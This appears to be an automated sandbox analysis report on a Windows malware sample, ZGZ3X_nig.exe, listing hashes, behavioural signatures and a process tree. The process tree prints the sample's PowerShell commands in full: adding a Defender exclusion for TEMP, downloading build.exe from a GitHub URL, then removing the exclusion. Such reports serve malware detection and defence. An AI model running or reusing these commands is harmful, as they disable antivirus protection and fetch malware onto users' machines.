Analysis
- max time kernel: 120s
- max time network: 121s
- platform: windows7_x64
- resource: win7-20240903-en
- resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
- submitted: 22/03/2025, 05:53
Behavioral task behavioral1
- Sample: ZGZ3X_nig.exe
- Resource: win7-20240903-en
Behavioral task behavioral2
- Sample: ZGZ3X_nig.exe
- Resource: win10v2004-20250314-en
General
- Target: ZGZ3X_nig.exe
- Size: 57KB
- MD5: 16edd47bf01716b24958a0b3a3a7bcfb
- SHA1: 8b7972f4190c2ca9d600084611e966fa0f899b98
- SHA256: 568d485f89554f0a315d1f839e5e2b33c7735f9b3dc3892391bdaa16a3f480e8
- SHA512: 9e6ca1cbfa194aff3aebb60fa7b73ee4ff63f9770cfe1d114b757d55693278ccb8f6a450235255a3ae03ac382b528b899eb973d571523fe12e3910b9568d38e1
- SSDEEP: 768:d5qkvPJg++TldUQJbxc1knPItshRGibgFfYTrTQc1mRdJcWvFM79yipBvSrrCeao:3rPJVKjbcknWSOYvTfkWkFM79yQVFu/
Malware Config
Signatures
Command and Scripting Interpreter: PowerShell 2 IoCs
  pid   Process
  2880  powershell.exe
  2584  powershell.exe
Yara rule matches 2 IoCs
  resource                                                                     yara_rule
  behavioral1/memory/2680-0-0x0000000140000000-0x0000000140028000-memory.dmp   upx
  behavioral1/memory/2680-28-0x0000000140000000-0x0000000140028000-memory.dmp  upx
Hide Artifacts: Ignore Process Interrupts 1 TTPs 2 IoCs
Command interpreters often include specific commands/flags that ignore errors and other hangups.
  pid   Process
  2880  powershell.exe
  2960  powershell.exe
Runs net.exe
Suspicious behavior: EnumeratesProcesses 3 IoCs
  pid   Process
  2880  powershell.exe
  2584  powershell.exe
  2960  powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs
  description              pid   Process
  Token: SeDebugPrivilege  2880  powershell.exe
  Token: SeDebugPrivilege  2584  powershell.exe
  Token: SeDebugPrivilege  2960  powershell.exe
Suspicious use of WriteProcessMemory 18 IoCs
  description                       pid   Process        procid_target
  PID 2680 wrote to memory of 2760  2680  ZGZ3X_nig.exe  31
  PID 2680 wrote to memory of 2760  2680  ZGZ3X_nig.exe  31
  PID 2680 wrote to memory of 2760  2680  ZGZ3X_nig.exe  31
  PID 2760 wrote to memory of 2796  2760  cmd.exe        32
  PID 2760 wrote to memory of 2796  2760  cmd.exe        32
  PID 2760 wrote to memory of 2796  2760  cmd.exe        32
  PID 2796 wrote to memory of 2888  2796  net.exe        33
  PID 2796 wrote to memory of 2888  2796  net.exe        33
  PID 2796 wrote to memory of 2888  2796  net.exe        33
  PID 2760 wrote to memory of 2880  2760  cmd.exe        34
  PID 2760 wrote to memory of 2880  2760  cmd.exe        34
  PID 2760 wrote to memory of 2880  2760  cmd.exe        34
  PID 2760 wrote to memory of 2584  2760  cmd.exe        35
  PID 2760 wrote to memory of 2584  2760  cmd.exe        35
  PID 2760 wrote to memory of 2584  2760  cmd.exe        35
  PID 2760 wrote to memory of 2960  2760  cmd.exe        36
  PID 2760 wrote to memory of 2960  2760  cmd.exe        36
  PID 2760 wrote to memory of 2960  2760  cmd.exe        36
Processes (nesting shows parent/child depth)
1. C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe
   Command line: "C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe"
   PID: 2680
   - Suspicious use of WriteProcessMemory
   2. C:\Windows\system32\cmd.exe
      Command line: "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\AE9.tmp\AEA.tmp\AEB.bat C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe"
      PID: 2760
      - Suspicious use of WriteProcessMemory
      3. C:\Windows\system32\net.exe
         Command line: net session
         PID: 2796
         - Suspicious use of WriteProcessMemory
         4. C:\Windows\system32\net1.exe
            Command line: C:\Windows\system32\net1 session
            PID: 2888
      3. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
         Command line: powershell -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"
         PID: 2880
         - Command and Scripting Interpreter: PowerShell
         - Hide Artifacts: Ignore Process Interrupts
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of AdjustPrivilegeToken
      3. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
         Command line: powershell -NoProfile -ExecutionPolicy Bypass -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; iwr -Uri \"https://github.com/nfdsafnsdl/login/releases/download/V1/build.exe\" -OutFile \"C:\Users\Admin\AppData\Local\Temp\build.exe\" -ErrorAction Stop"
         PID: 2584
         - Command and Scripting Interpreter: PowerShell
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of AdjustPrivilegeToken
      3. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
         Command line: powershell -NoProfile -ExecutionPolicy Bypass -Command "Remove-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"
         PID: 2960
         - Hide Artifacts: Ignore Process Interrupts
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 2KB
  MD5: 1c935ef28fdfd394b770d945d7f04d76
  SHA1: 29e251c3c40ce4ad1b2984bf26b444aa045d9b21
  SHA256: aa58e1df5882878a44687853f47d10b655c3fe888ec20fb99446305f5d38c681
  SHA512: a9e60f2ac4aec15a3ba0a95df224449f64777a027357792247dd597529542e79128aec996c89ff86a1654911b4b763c577d3c3d2f38c59b02b280b8ad824e7e1
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  Filesize: 7KB
  MD5: 9e6c51a3f6886d64fc6dfcfc4f376fb4
  SHA1: da9e5844939fd2b6d823870bb483ecf63855b440
  SHA256: 7a8239e7feee11f3922e57d89df79f9085aea7a1b29aca255eaab35880badb24
  SHA512: e5f3b4f5ddb515fd5d69f93c21313c18dc0cbe93785b2385f370c2fa8f77acd7c27c67880d25f884037654af8e3fe11b983139d18632b56ece1fd1c5ed223b79